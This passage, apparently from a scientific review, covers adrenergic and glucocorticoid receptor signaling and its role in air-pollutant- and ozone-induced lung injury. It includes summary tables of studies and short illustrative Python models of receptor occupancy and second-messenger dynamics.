ARs and GRs, Their Subtypes, and Roles in Homeostatic Functions
Adrenal-derived catecholamines (epinephrine and norepinephrine) and glucocorticoids that are released into the blood in response to stress maintain vital homeostatic functions through binding to their receptors, ARs and GRs, respectively [16][17][18]. The stress signal, perceived or physiological, conveyed through the autonomic sensory nerves or generated within the central nervous system (CNS), leads to hypothalamic sympathetic activation, which initiates the body's response through the activation of the neuroendocrine system [19]. The activation of sympathetic nerves, with wide cellular distribution among different organs, releases norepinephrine (NE) at nerve terminals, which, in a paracrine manner, binds to ARs on effector cells in order to mediate immediate changes in cellular function in response to stress [20]. The other important function of sympathetic nerves, which innervate the adrenal medulla, is to mediate the synthesis and release of epinephrine and norepinephrine into circulation through the sympathetic–adrenal–medullary (SAM) axis (Figure 1) [21]. On sympathetic activation, the adrenal medulla releases catecholamines, endogenous ligands with differing affinities for AR subtypes. The activation of the sympathetic nervous system in response to stress is also associated with hypothalamic release of corticotropin-releasing hormone through portal circulation to the anterior pituitary, which then stimulates the synthesis and release of adrenocorticotropic hormone into systemic circulation [22]. Once released, this hormone stimulates the synthesis and release of corticosteroids (referred to as cortisol in humans and corticosterone in rodents) and mineralocorticoids into circulation through the hypothalamic–pituitary–adrenal (HPA) axis. Cortisol and mineralocorticoids released into circulation then bind to GRs and mediate cellular responses to stress (Figure 1) [23,24]. Impairment of the SAM and HPA axes has been linked to a wide array of neuropsychiatric conditions, and even chronic peripheral diseases [16,17].
Through varied subtypes, cell- and tissue-specific distribution, and substrate specificities, as well as transcriptional and translational modifications, ARs and GRs maintain diurnal and stress-induced cardiovascular, respiratory, metabolic, and immune functions [1,25]. The diversity of the receptor subtypes, the plasticity of their function, and their cooperativity with other signaling regulators, along with variations in their distribution density at organ and cellular levels, enable a precise and coordinated response tailored to a stressor in a cell- and organ-specific manner. The oscillatory and diurnal pattern of release of these hormones enables temporal regulation of normal cellular physiological functions, whereas stress-induced increases are critical to cellular changes that enable the cellular response to be phenotypically expressed in a reversible manner [26,27].
The two major types of AR, alpha and beta (αARs and βARs), each having several different subtypes, mediate the peripheral and central effects of catecholamines [28]. α 1 ARs, with affinity for both epinephrine and norepinephrine, are widely distributed in smooth muscles, where they mediate contraction [29]. α 2 ARs, on the other hand, are mostly presynaptic at adrenergic and cholinergic nerve terminals, and they counteract the sympathetic effects of smooth muscle contraction (Table 1) [29]. β 1 ARs, with similar affinity for epinephrine and norepinephrine, are distributed predominantly in the heart and kidney muscles, where they induce muscle contraction to increase heart rate and renin release in glomerular cells (reviewed in [30]). β 2 ARs are widely distributed in the respiratory, vascular, and uterine smooth muscles, where they increase relaxation, regulate fluid balance, and influence inflammatory responses, and in the liver they mediate glucose release. β 3 ARs are predominant in adipose tissue and the bladder wall, where they increase adipose lipolysis and relax the bladder muscle, respectively [31].

Table 1. Adrenergic (AR) and glucocorticoid (GR) receptor subtypes and their substrate preferences, tissue distribution, and cellular functions. AR and GR subtypes have been well characterized, and are widely manipulated therapeutically. Their wide but selective tissue distribution, efficacy for ligands, and receptor-subtype-specific functionality are critical in maintaining temporal and dynamic changes in biological processes to regulate homeostasis. EPI: epinephrine; NE: norepinephrine; CNS: central nervous system; SNS: sympathetic nervous system. [25]

GR-α (the predominant GR and, thus, generally referred to as GR), with various splice forms, is universally distributed in all cells/organs, and is activated by cellular glucocorticoids to induce tissue-specific metabolic and immune changes through genomic and nongenomic mechanisms [25,34]. The less widely distributed GR-β is located in the nucleus, and antagonizes the transcriptional activity of GR-α through varied mechanisms [25]. GR activation suppresses the immune response by directly inhibiting the gene expression of proinflammatory mediators [31]. In some instances, glucocorticoid-bound GRs can also act through nongenomic mechanisms to affect cellular function [35]. Precise regulation of the downstream effects of GR activation is achieved through various posttranscriptional alterations, regulatory processes, and cooperativity with other transcription factors within the nucleus.
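As Table 1 emphasizes, subtype-specific ligand affinity is one mechanism by which the same hormone surge produces receptor-specific responses. A back-of-the-envelope illustration using a one-site equilibrium occupancy model is sketched below; the dissociation constants are hypothetical placeholders, not measured affinities, and real agonist responses also depend on receptor density and coupling efficiency.

```python
# One-site equilibrium occupancy: fraction bound = [L] / ([L] + Kd).
# Kd values are hypothetical placeholders, not measured affinities.
def occupancy(ligand_nM, kd_nM):
    """Fraction of receptors occupied at equilibrium."""
    return ligand_nM / (ligand_nM + kd_nM)

kd = {"EPI at beta2AR": 100.0, "NE at beta2AR": 3000.0}   # hypothetical nM
for conc in (10.0, 100.0, 1000.0):                        # resting to stress-level hormone, nM
    row = ", ".join(f"{name}: {occupancy(conc, k):.2f}" for name, k in kd.items())
    print(f"[ligand] = {conc:6.1f} nM -> {row}")
```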
Cellular Signaling through Activation of ARs
Epinephrine and norepinephrine released into circulation from the adrenal glands and nerve terminals activate ARs, which are G-protein-coupled receptors (GPCRs), to induce cellular changes in tissues, including the lung (Figure 2) [36,37]. Catecholamine binding to ARs mediates rapid muscle contraction or relaxation [38], increases heart rate [39], and stimulates adipose lipolysis [40]. The activation of ARs through these ligands initiates a cascade of events involving distinct G proteins, subsequently producing second messengers [41,42]. Nine subtypes of αARs and βARs (α 1a , α 1b , α 1c , α 2a , α 2b , α 2c , β 1 , β 2 , and β 3 ) have specific ligand-binding properties, and involve different but coordinated regulatory mechanisms [43]. α 1 ARs are G αq -coupled and activate phospholipase C, which mediates the production of inositol triphosphate (IP3) and diacylglycerol (Figure 2). These increases in second messengers enhance the intracellular release of free calcium, causing activation of protein kinase C, which is involved in multiple signaling mechanisms [29]. α 2 ARs, when bound to ligands, couple with G αi and exert autoinhibitory effects by decreasing protein kinase A (PKA) activity and inhibiting the production of cyclic AMP (cAMP) by adenylate cyclase, thus counteracting the effects of α 1 AR [29].

Figure 2. The right panel shows cell signaling through α 1 AR and β 2 AR. β 2 AR signaling involves cAMP-mediated activation of PKA through phosphorylation, and effects on transcription factors that mediate the expression of genes regulating bronchodilation, inflammation, and epithelial transport. α 1 AR signaling, on the other hand, leads to increases in intracellular free calcium through the activation of phospholipase C and diacylglycerol, where the activation of PKC causes pulmonary vasoconstriction. β 2 AR: beta 2 adrenergic receptors; α 1 AR: alpha 1 adrenergic receptors; ATP: adenosine triphosphate; cAMP: cyclic adenosine monophosphate; PKA: protein kinase A.
On the other hand, βARs are G αs -coupled, and involve the activation of protein kinase A (PKA) through stimulation of adenylate cyclase and cAMP production. The binding of hormone ligands to β 1 AR leads to the production of a number of second messengers that are involved in the downstream activation of transcription factors. cAMP-dependent protein kinase A phosphorylates calcium channels, leading to increased concentrations of intracellular calcium, facilitating contraction of the myosin light chain and, thus, the contractility of muscle cells [30]. The activity of β 2 AR-mediated PKA signaling in airway smooth muscle cells involves other proteins, such as phospholipase C, myosin light-chain kinase (MLCK), IP3, calcium channels, and heat shock protein 20, which, when phosphorylated, inhibit signaling that leads to smooth muscle contraction (Figure 2) (reviewed in [33]). β 2 AR may also coordinate with reduced nicotinamide adenine dinucleotide phosphate (NADPH) oxidase through PKA and β-arrestin to mediate oxidative stress [44]. Ligand binding to βARs and activation of G αs lead to receptor phosphorylation by kinases, facilitating binding of one of the four β-arrestins to the complex [45]. A cascade of events follows, leading to autoregulation of further activation, preparation of the receptor complex for internalization, and activation of other signaling pathways, such as extracellular signal-regulated kinases (ERKs) [46]. βARs also complex with G βγ subunits to induce intracellular signaling and mediate functions of ion channels, as well as the activation of phospholipase C and G protein receptor kinase [47]. In addition to these canonical pathways that mediate signaling to induce second messenger activation, βARs also mediate signaling that does not involve G proteins and subsequent cAMP production. For example, β 2 AR can activate the glycogen synthase kinase 3β signaling pathway, which involves serine/threonine protein kinase (AKT) [48], while β 1 AR can also mediate signaling through other kinases, including mitogen-activated protein kinase (MAPK) and stress-activated protein kinase (SAPK), to induce transcriptional changes [49]. The activation of GPCRs and production of second messengers are regulated temporally based on the diurnal cycle, and spatially to mediate diverse cellular changes [50]. Moreover, there is an oscillatory pattern of changes in AR-mediated second messenger production, leading to differential amplitude and frequency of their actions, which may program temporally different downstream responses based on the diurnal cycle [51].
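The cascade just described (ligand binding, G αs activation, adenylate cyclase stimulation, cAMP accumulation, PKA activation) can be caricatured with two coupled rate equations. The sketch below, with arbitrary illustrative rate constants, reproduces only the qualitative shape of a cAMP and PKA transient after an epinephrine pulse; it is a didactic toy, not a parameterized model of β 2 AR signaling.

```python
# Toy two-variable model of beta2AR second-messenger dynamics.
# d[cAMP]/dt = synthesis driven by receptor occupancy - degradation
# d[PKA*]/dt = activation by cAMP - deactivation
# All rate constants and the Kd are arbitrary illustrative values.
import numpy as np

def simulate(t_end=60.0, dt=0.01):
    k_syn, k_deg = 1.0, 0.5        # cAMP synthesis / degradation (1/min)
    k_act, k_off = 0.8, 0.3        # PKA activation / deactivation (1/min)
    kd = 50.0                      # hypothetical epinephrine Kd at beta2AR (nM)
    t = np.arange(0.0, t_end, dt)
    epi = np.where((t > 5.0) & (t < 20.0), 100.0, 1.0)   # 15-min epinephrine pulse (nM)
    camp = np.zeros_like(t)
    pka = np.zeros_like(t)                               # fraction of PKA active
    for i in range(1, t.size):
        occ = epi[i] / (epi[i] + kd)                     # receptor occupancy
        camp[i] = camp[i - 1] + dt * (k_syn * occ - k_deg * camp[i - 1])
        pka[i] = pka[i - 1] + dt * (k_act * camp[i - 1] * (1.0 - pka[i - 1])
                                    - k_off * pka[i - 1])
    return t, camp, pka

t, camp, pka = simulate()
print(f"peak cAMP {camp.max():.2f} (a.u.), peak active PKA fraction {pka.max():.2f}")
```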
Cellular Signaling through Activation of GRs
Increases in circulating free lipophilic glucocorticoids lead to their cellular entry, binding to GRs and mediating a series of events leading to their nuclear translocation, binding to gene sequences at many different sites, and influencing the expression of a major pool of genes (Figure 3). The bioavailability of intracellular glucocorticoids is regulated by 11β-hydroxysteroid dehydrogenase 2, which converts active glucocorticoids to cortisone, an inactive form, whereas 11β-hydroxysteroid dehydrogenase 1 converts cortisone back to corticosterone or cortisol [52]. The spatial and cellular distribution of these enzymes can control the availability of glucocorticoids to bind to GRs. On binding to GRs, glucocorticoids at physiological levels regulate immune and metabolic homeostasis; however, under acute stress, glucocorticoids can also act to increase proinflammatory mediators when concentrations reach critical levels [53,54]. As reviewed by Oakley and Cidlowski [25], GRs constitute a major class of nuclear transcription factors, and are estimated to regulate about 10-20% of the human genome.
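Because intracellular ligand availability reflects the balance of the two opposing 11β-HSD activities, a two-pool interconversion model makes the point concrete: the steady-state fraction of hormone in the active form is set by the ratio of the conversion rates, so tissue-specific enzyme expression tunes local GR occupancy. The rate constants below are arbitrary illustrative values.

```python
# Two-pool interconversion between active glucocorticoid (cortisol/corticosterone)
# and inactive cortisone, governed by 11beta-HSD1 (reactivation) and
# 11beta-HSD2 (inactivation). Rate constants are arbitrary illustrative values.
import numpy as np

def steady_state_active_fraction(k_hsd1, k_hsd2, total=1.0, t_end=100.0, dt=0.01):
    active, inactive = 0.0, total
    for _ in np.arange(0.0, t_end, dt):
        flux = k_hsd1 * inactive - k_hsd2 * active   # net reactivation flux
        active += dt * flux
        inactive -= dt * flux
    return active / total

# HSD2-dominant (kidney-like) vs HSD1-dominant (liver-like) parameter sets:
print("HSD2-dominant:", round(steady_state_active_fraction(0.2, 1.0), 3))
print("HSD1-dominant:", round(steady_state_active_fraction(1.0, 0.2), 3))
# Analytic check: steady-state active fraction = k_hsd1 / (k_hsd1 + k_hsd2).
```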
Human GRs are encoded by NR3C1, where 13 variants of exon 1 harbor binding sites for numerous transcription factors, including GRs themselves, which enables tight regulation of their own expression. Exon 1 of NR3C1 is also regulated by epigenetic modifications (reviewed in [13]). By transcriptionally regulating the expression of thousands of genes (transactivation and transrepression), the specificity of GRs is achieved by their different splice variants and context-specific regulation. Cytosolic GRs, in the absence of glucocorticoids, exist as monomers complexed with chaperone proteins, aiding their maturation for transcriptional activity. On binding to glucocorticoids, several of the proteins complexed with GRs are replaced by FK506-binding protein 51 (FKBP51) and the p23 chaperone protein, preparing the complexes for nuclear translocation and DNA binding [13]. In addition to the binding of GR homodimers to palindromic sequences on DNA (glucocorticoid response elements; GREs), GR complexes can also be exported back to the cytoplasm as another regulatory control of their transcriptional activity [55]. GR homodimer binding to GREs directly activates transcription of genes (transactivation) or silences transcription (reviewed in [13]). GRs can also partner with other transcription factors to modulate changes in gene transcription, including activator protein 1 (AP-1), nuclear factor kappa B (NF-κB), and signal transducers and activators of transcription (STAT). Through transrepression by interacting with AP-1 and NF-κB, GRs decrease the expression of proinflammatory genes. Through interaction of GREs with the STAT family of transcription factors, GRs enhance the transcriptional activity of genes regulated by these transcription factors (reviewed in [25]).

Figure 3. A schematic of lung cellular effects from activating GRs. Lipophilic glucocorticoids enter cells freely. Upon entering cells, glucocorticoids bind to GRs, which exist in the cytoplasm complexed with heat shock proteins 70 and 90 (Hsp70 and Hsp90), p23, and other proteins, such as steroid receptor coactivator (SRC). Upon binding to glucocorticoids, other proteins are recruited into the complex, preparing it for nuclear translocation. Once in the nucleus, GRs recruit P300/CBP-associated factor (PCAF), CREB-binding protein (CBP), and histone acetyltransferase (HAT), allowing the complex to modify the chromatin framework and bind to glucocorticoid response elements (GREs) in promoter sequences of DNA. This results in transactivation or transrepression, leading to activation or inhibition of gene transcription. This is achieved through the direct binding of the GR complex to GREs and/or its interaction with other transcription factors (some details are omitted from the figure for simplicity). Through their transcriptional regulation of gene expression, GRs change the expression of genes involved in inflammation, the acute-phase response, and anti-inflammatory mechanisms. GILZ: glucocorticoid-induced leucine zipper; MT-1: metallothionein-1; SGK: serine/threonine-protein kinase.
The effects of GR activation on gene expression are diverse, and regulated by complex cytoplasmic and nuclear signaling processes, which are central to producing the proteins needed to orchestrate the dynamic cellular physiological response to stress. GRs have been shown to interact with NF-κB in the cytosol of rat liver cells through nongenomic mechanisms. To suppress the nuclear translocation of NF-κB, cytosolic GRs, even without ligand binding, physically interact with p65/p50 and IκB subunits [56,57]. Whereas inflammatory stimuli upregulate MAPK-associated pathways, GR activation induces stress-responsive proteins, including glucocorticoid-induced leucine zipper (GILZ, also known as TSC22d3), MAPK phosphatase-1, and annexin-1 [56]. MAPK phosphatase-1 and annexin-1 suppress the MAPK pathway to decrease the inflammatory response [58,59]. GR binding to glucocorticoids has been shown to modulate other cellular processes that are not regulated by genomic mechanisms; for example, GRs induce changes in membrane configuration, alter MAPK signaling through the GR-binding proteins, and regulate the transcription of mitochondrial genes [60].
Plasticity in GR-mediated biological processes is complex and influenced by multiple regulatory impacts on its activity [17]. Posttranslational modifications of GR, including phosphorylation, ubiquitination, and acetylation, can also modulate GR activity. In addition, a single base pair change in the GRE binding consensus DNA sequences can change the binding capacity of GRs [61]. The accessibility of GRs to specific GREs is also regulated by the chromatin landscape and DNA-binding proteins in given cell types, where GREs that are easily accessible to GRs are thought to be occupied at low concentrations of glucocorticoids, giving another option for concentration-dependent differences in the types of genes being activated. These multiple controls on the transcriptional activity of GRs enable plasticity in regulating homeostatic physiological processes (reviewed in [13,25,62]).
Distribution of AR and GR Subtypes in the Lungs
Conducting airways, parenchyma, pulmonary vasculature, and epithelial cells selectively express AR and GR subtypes that are essential in maintaining the homeostatic function of the lungs [1]. α 1 ARs are expressed in pulmonary and vascular smooth muscle cells, and mediate vasoconstriction [63]. Of all ARs, βARs are distributed most abundantly and widely in various cells of the lungs. They are expressed in vessel walls, airway smooth muscles, submucosal glands, and on distal airways and alveolar walls [1,64]. β 2 ARs make up approximately 70% of all pulmonary βARs [65]. β 2 ARs are specifically present in airway, vascular smooth muscle, and epithelial cells, whereas β 1 ARs are primarily localized in alveolar walls and submucosal glands. In the alveolar walls, β 1 ARs are more abundant when compared with β 2 ARs [1]. β 2 ARs have been shown to play a role in alveolar fluid clearance, as well as immune surveillance [65,66]. When activated by ligands such as epinephrine or other beta-agonist drugs, β 2 ARs increase intracellular cAMP and calcium channel activation to cause smooth muscle relaxation and bronchodilation (Figure 2) [67]. In the lungs, capsaicin-sensitive sensory nerves and mast cells also express β 2 ARs. Although other immune cells in the lungs express relatively low levels of β 2 ARs [1], these receptors are abundantly expressed in structural pulmonary cells, predominantly in airway and endothelial cells [68,69]. β 3 ARs present in pulmonary vascular smooth muscle are known to cause vasodilation of the pulmonary artery through the cAMP-dependent pathway [69][70][71]. However, the underlying mechanisms by which each AR subtype modulates the pulmonary effects of air pollutants remain largely unelucidated.
GRs (GRαs) have a much wider tissue distribution throughout the body, including the lungs. All structural and immune cells within the lungs express GRs, but likely with differential density and different coregulatory mechanisms that enable cell-specific effectiveness of glucocorticoids [1]. It has been suggested that endothelial and pulmonary epithelial cells, which readily secrete proinflammatory mediators and have specific roles in maintaining homeostatic immune regulation at the air–liquid interface, may express GRs more abundantly than other cell types [1]. In asthmatic lungs, compared with healthy lungs, GRs are distributed much more widely among smooth muscle cells, fibroblasts, and macrophages, and may play a role in controlling overly activated inflammatory responses [72]. Because GRs are also distributed widely in other organ systems, inhaled steroids are used to reduce the local pulmonary inflammatory response without causing systemic effects in patients with asthma and COPD. The majority of GR subtypes in tissues are GRαs. GRβs, which antagonize the effects of GRαs, are present at relatively low levels in tissues, and are sparsely distributed in the lungs. It has been shown that steroid-resistant asthma patients have increased expression of GRβs [73].
ARs and GRs are prime therapeutic targets for treating pulmonary and cardiovascular diseases. β 2 AR agonists are used in patients with COPD and asthma, whereas antagonists of β 1 AR are used for hypertension and more advanced cardiac complications, such as heart failure [74][75][76]. The therapeutic use of GR agonists can greatly reduce the inflammatory response, both in the lungs and systemically [77]. Generally, the combination of β 2 AR agonists and glucocorticoids is prescribed to asthma and COPD patients in order to promote bronchodilation and reduce inflammation [78]. Because irritant pollutants induce increases in circulating endogenous epinephrine and glucocorticoids, which function as ligands for ARs and GRs, respectively, the understanding of AR and GR signaling in pulmonary and cardiovascular diseases can aid in determining their roles in modulating pulmonary and cardiovascular responses to inhaled air pollutants.
ARs and GRs in Air-Pollutant-Induced Lung Injury and Inflammation
When inhaled, physiochemically diverse pollutants produce local cellular changes and activate cell signaling pathways that promote cell injury, proinflammatory cytokine release, and oxidative cell changes, leading to immune cell extravasation to the pulmonary tissue [79,80]. Although local pulmonary cellular changes have been characterized extensively with acute exposure to different pollutants, the mechanisms by which the immune response is activated and immune cells are recruited from lymphoid organs, matured, and extravasated to the site of injury are not well understood. Our recent studies have shown that the adrenergic and glucocorticoid pathways are involved in pulmonary vascular leakage and inflammatory response induced by irritant pollutants, such as ozone [14,81,82]. In light of recent research into the marked effects of air pollutants on the brain [7,[82][83][84], and the involvement of the neuroendocrine system with increased adrenal-derived stress hormones [85], it is conceivable that AR and GR activation are involved in the health effects of air pollution. Understanding the roles of these receptors may explain how a pulmonary inflammatory response is generated after exposure to air pollutants, why there is tolerance or adaptation to this initial pulmonary response, how individuals with psychosocial disorders and altered neuroendocrine regulation may be more susceptible, and what systemic mediators are critical for initial injury and inflammation.
Air Pollution Studies Implicating the Role of ARs
Epidemiological studies have highlighted that polymorphisms in β 2 AR, especially Arg16, increase the risk of airway hyperresponsiveness in asthma, decrease forced expiratory volume in one second (FEV 1 ), and impair overall lung function [86,87]. Particulate matter (PM) exposure in dogs induces peripheral vascular resistance via αAR activation; this effect is attenuated by the αAR antagonist prazosin [88]. Moreover, a number of epidemiological studies have linked air pollutant exposure to increases in stress hormones [89][90][91], which may involve effects on ARs, GRs, and downstream cellular changes (Table 2).

Table 2. Selected respirable particulate matter (PM) and acrolein studies incorporating the roles of adrenergic receptors (ARs) and glucocorticoid receptors (GRs) and/or their endogenous ligands, catecholamines and glucocorticoids, respectively. Only the data pertaining to ARs and GRs are summarized in the table. * There are a number of cigarette smoke and other studies that have implicated the contribution of ARs and GRs to observed health effects, but only one example is provided. LPS: lipopolysaccharides; PM: respirable particulate matter; NF-κB: nuclear factor kappa B; IL-6: interleukin 6; NO 2 : nitrogen dioxide.
Pollutant Type | Model System | Receptor Subtype | Study Design and Outcome | Reference
Ambient PM | Human trial | Endogenous ligands for ARs and GRs | PM exposure increased cortisol, epinephrine, and norepinephrine, and changed glucose and lipid metabolites in serum. | [89]
Ambient NO 2 (traffic) | Epidemiology | Endogenous GR ligand | NO 2 but not PM exposure was associated with increased morning cortisol in plasma. | [90]
Ambient pollutants | Epidemiology | Endogenous AR ligand | Ambient pollution was associated with increases in urine catecholamines. | [91]
Ambient PM | Dog | αARs | Dogs exposed to ambient PM through a tracheal tube had increased blood pressure; this PM effect was inhibited by αAR antagonists. | [88]
Cigarette smoke * | Lung epithelial cell line | βARs | Suppression of inflammatory cytokine production through β-arrestin signaling was linked to βARs and inhibition of autophagy through AMPK in cigarette-smoke-condensate-exposed cells. | [92]
LPS | Macrophage cell line | β 2 AR and β-arrestin | β 2 AR negatively regulated NF-κB via β-arrestin 2 and through stabilizing the NF-κB/IκB-α complex. | [93]
Ambient PM | Mice in vivo, and human macrophages | β 2 AR and its ligand | PM exposure in mice increased circulating catecholamines and macrophage IL-6 release. In human macrophages, β 2 AR agonists increased, and antagonists decreased, IL-6 production. | [8]
Acrolein | Rat | Endogenous ligands for ARs and GRs | Acrolein inhalation increased corticosterone and epinephrine in Wistar and diabetic Goto-Kakizaki rats, which were associated with nasal injury and inflammation. | [94]
Ambient PM | Adra2b-transgenic mice | α 2 AR | Concentrated PM exposure increased blood pressure and anxiety-like behavior, which was associated with upregulation of inflammatory genes in the brains of Adra2b-transgenic mice overexpressing α 2b AR. | [95]
Diesel exhaust | Endothelial cells | βARs | In endothelial cells, diesel exhaust extract increased inflammatory cytokine release; this effect was inhibited by βAR and calcium channel inhibitors in an extract-specific manner. | [3]
Ambient PM | Rat microvessels, ex vivo | αARs | Microvessels isolated from PM-exposed rats had inhibited endothelium-dependent arteriolar dilation. αAR blockade inhibited the PM effects. | [96]
Ambient air pollution | Humans and mice | Endogenous ligands for GRs | Exposure to air pollution was associated with increased plasma cortisol in humans and corticosterone in mice. In mice, PM increased hippocampal inflammation and inhibited GR expression. | [97]
Metal mixture | Mouse macrophage cell line | GR activation | GR activity was inhibited by selected metals, as indicated by a reporter luciferase assay. | [98]
Ambient PM | Rat | GRs | Increased expression of genes regulated by activation of GRs in multiple tissues, including lung. | [99]

The contributions of β 2 AR signaling to cigarette-smoke-, lipopolysaccharide (LPS)-, and other pollutant-induced lung injury and inflammation have been examined in a few experimental studies. β 2 AR signaling through GPCR-kinase-mediated phosphorylation and binding to β-arrestin can influence inflammatory cell signaling. Given the contribution of β-arrestin 2 activation to inhibiting autophagy via the adenosine monophosphate-activated kinase (AMPK)/mammalian target of rapamycin (mTOR) pathway, and the suppression of inflammatory cytokine production in human bronchial epithelial cells (BEAS-2B) exposed to cigarette smoke [92], it will be important to determine how the activation of β 2 AR after air pollution exposure may contribute to inflammation in the lungs through β-arrestin. In human blood monocytes, activation of βAR subtypes by isoproterenol repressed the LPS-induced secretion of inflammatory cytokines, such as TNF-α and IL-6 [100]. In the same manner, immunosuppression through inhibiting the NF-κB pathway occurred in bone-marrow-derived macrophages with norepinephrine binding to ARs [93]. β 2 AR's interaction with toll-like receptors has been shown to cause immunosuppression through upregulation of anti-inflammatory gene expression [101]. The inhibitory effects of βAR agonists on the immune response have been shown to occur through the negative regulation of type 2 innate lymphoid cells [102]; however, when the β 2 AR transgene was overexpressed in gene knockout or in wild-type mice, the proinflammatory phenotype was exacerbated [103]. Thus, although the evidence for β 2 AR's involvement in immunosuppression is substantial [104], recent evidence suggests its contribution to promoting innate inflammatory responses through increased IL-6 production [8]. Experimentally, it has been shown that acute exposure to air pollutants, such as ozone and acrolein, activates the sympathetic nervous system, causing local and systemic secretion of catecholamines [8,14,94,105]. The activation of β 2 AR by agonists potentiates pulmonary inflammatory responses through exacerbating macrophage release of IL-6 [8]. The activation of β 2 AR in alveolar macrophages by ambient PM was demonstrated to induce the release of mitochondrial reactive oxygen species and phosphorylation of the cAMP-response-element-binding protein (CREB) to increase IL-6 transcription [8]. Recently, Richie et al. [106] have also shown that increased IL-6 production by β 2 AR agonists in cells infected with respiratory syncytial virus involved the cAMP response element (CRE).
Moreover, overexpression of α 2 bAR (Adra2b) in transgenic mice resulted in increased gene expression of Il-6, Tlr2, and Tlr4, enhancing inflammation in the brain following PM exposure [95].
The involvement of ARs has been shown in other air pollution studies examining cardiovascular effects. Increases in intracellular free calcium in endothelial cells after exposure to diesel exhaust particles were shown to involve βARs [3]. In a rat model of acute myocardial infarction, exposure to particulate matter resulted in exacerbation of injury, while treatment with metoprolol, a β 1 AR-specific blocker, reduced the effect [9]. The vasoconstriction response observed in isolated microvessels from PM-exposed rats was inhibited by αAR blockade [96]. Thus, some studies have emphasized the role of different AR subtypes in mediating pulmonary and cardiovascular effects of air pollutants; however, the cellular mechanisms, and how pollutant exposure results in increased circulating ligands for ARs, are just beginning to emerge. Although the role of sympathetic activation in mediating cardiovascular effects has been established [107,108], and epidemiological studies have shown associations between circulating catecholamines and air pollution [91], the mechanisms of central regulation mediating the release of catecholamines responsible for activating ARs have yet to be demonstrated in ambient PM studies.
Air Pollution Studies Implicating the Role of GRs
While a few studies have implicated the involvement of ARs in mediating inflammatory responses in the lungs after air pollution exposure, even fewer have examined the role of GRs (Table 2). This is despite significant evidence that air pollution may induce resistance to inhaled glucocorticoids in patients with asthma and COPD [109]. Jia et al. [97] reported that cortisol levels were increased in humans exposed to air pollutants; this effect was recapitulated in mice after exposure to heavy air pollution, and was associated with hippocampal inflammation as well as behavioral alterations. These studies imply that glucocorticoids are likely involved, and mediate their effects centrally through the activation of GRs. The endocrine-disrupting effects of metals were examined in vitro using different cell lines, including mouse macrophage cells, using a reporter luciferase assay for GR activation [98]. This study showed that GR activity was inhibited by selected metals. The effects of PM exposure on multiple organs, including the lungs, were linked to increased glucocorticoid activity in rats [99]. Although these studies show the involvement of GRs in mediating the acute effects of PM, it is not known how these receptors may be activated, or what coregulatory mechanisms are involved in mediating pulmonary vascular leakage and inflammation secondary to peripheral changes in immune cells. Understanding the mechanisms by which air pollutants stimulate the SAM and HPA stress axes, and their contribution to variations in individual susceptibility through GRs, could inform mitigation and therapeutic strategies.
ARs and GRs in Ozone-Induced Lung Injury and Inflammation
The strongest evidence for the role of catecholamine and glucocorticoid activation of ARs and GRs in mediating pulmonary injury and inflammation comes from our acute ozone inhalation studies [5][6][7]. Although the mechanisms of ozone-induced lung injury and inflammation are well characterized, the evidence that ozone exposure leads to increases in epinephrine and corticosterone in rats [14,105] and cortisol in humans [110] suggests that the receptors of these stress hormones are likely involved in mediating ozone's effects [111]. A number of our recent studies have demonstrated the contribution of ARs and GRs to mediating ozone-induced lung injury and inflammation (Table 3). Ozone was used as a prototypic air pollutant known to induce oxidant injury in the lungs [112]; it is not likely to translocate systemically, allowing us to test the contribution of the neuroendocrine system without direct effects in the periphery [80]. Below is an account of a series of studies that emphasized the role of ARs and GRs in mediating ozone's effects.

Table 3. Selected experimental studies involving ozone and the roles of adrenergic receptor (AR) and glucocorticoid receptor (GR) subtypes and/or their endogenous ligands, catecholamines and glucocorticoids, respectively. This table is not meant to be a comprehensive list of all experimental studies that mention ARs and/or GRs; rather, ozone studies focused on the lungs and addressing the roles of ARs and GRs and their endogenous ligands are listed.
Model System | Receptor Subtype/Endogenous Ligand | Study Design and Outcome | Reference
Human | Endogenous ligands for GRs | In a clinical study, ozone exposure increased plasma levels of cortisol, which was associated with increased lipid metabolites. | [110]
Rat | Endogenous ligands for ARs | Epinephrine levels increased in rats immediately after ozone exposure, and this was associated with lung injury, inflammation, and lymphopenia. | [14,105]
Rat | Endogenous ligand manipulation for ARs and GRs | Adrenal demedullation diminished circulating epinephrine, and total adrenalectomy diminished both epinephrine and corticosterone. This was associated with inhibition of ozone-induced lung injury, inflammation, lymphopenia, and lung expression of genes involved in AR and GR signaling, acute-phase response, hypoxia, and inflammation. | [4,113,114]
Rat | β 2 AR and GR agonists, individually or in combination | Pretreatment of rats with β 2 AR agonists exacerbated ozone-induced lung injury and inflammation. GR agonists, but not β 2 AR agonists, exacerbated ozone-induced lymphopenia. Combination treatment exacerbated both lymphopenia and lung effects, including gene expression of inflammatory markers and GR-responsive targets, in both sham and adrenalectomized rats. | [4,6,15]
Rat | βAR and GR antagonists | βAR antagonists suppressed ozone-induced lung vascular leakage and neutrophilia, while GR antagonists reversed lymphopenia but not lung neutrophilia. The combination of both antagonists inhibited all ozone-induced effects. | [5]
Rat | Endogenous ligands of ARs and GRs in brain effects | Depletion of circulating endogenous ligands, epinephrine, and corticosterone by adrenalectomy inhibited ozone-induced changes in gene expression within the brainstem and hypothalamus. This was associated with the reversal of ozone-induced decreases in circulating prolactin, luteinizing hormone, and thyroid-stimulating hormone. | [7]
Rat | Endogenous ligands for ARs and GRs | Over a 4-h period of ozone exposure, circulating epinephrine and corticosterone increased. These increases were followed by the depletion of circulating granulocytes, M1 monocytes, B and T lymphocytes, and lung expression of GR-regulated genes. Only small changes occurred in circulating cytokines. | [85]
Rat | Endogenous ligands for GRs | Ozone exposure increased corticosterone in lung lavage fluid and inhibited alveolar macrophage cytokine production. The stress-sensitive Fischer 344 strain exhibited greater effects than those of stress-resistant Lewis rats. Inhibiting corticosterone production increased inflammatory cytokine expression in macrophages. | [115]
Adrenalectomy Inhibits Lung Injury and Inflammation Induced by Acute Ozone Exposure
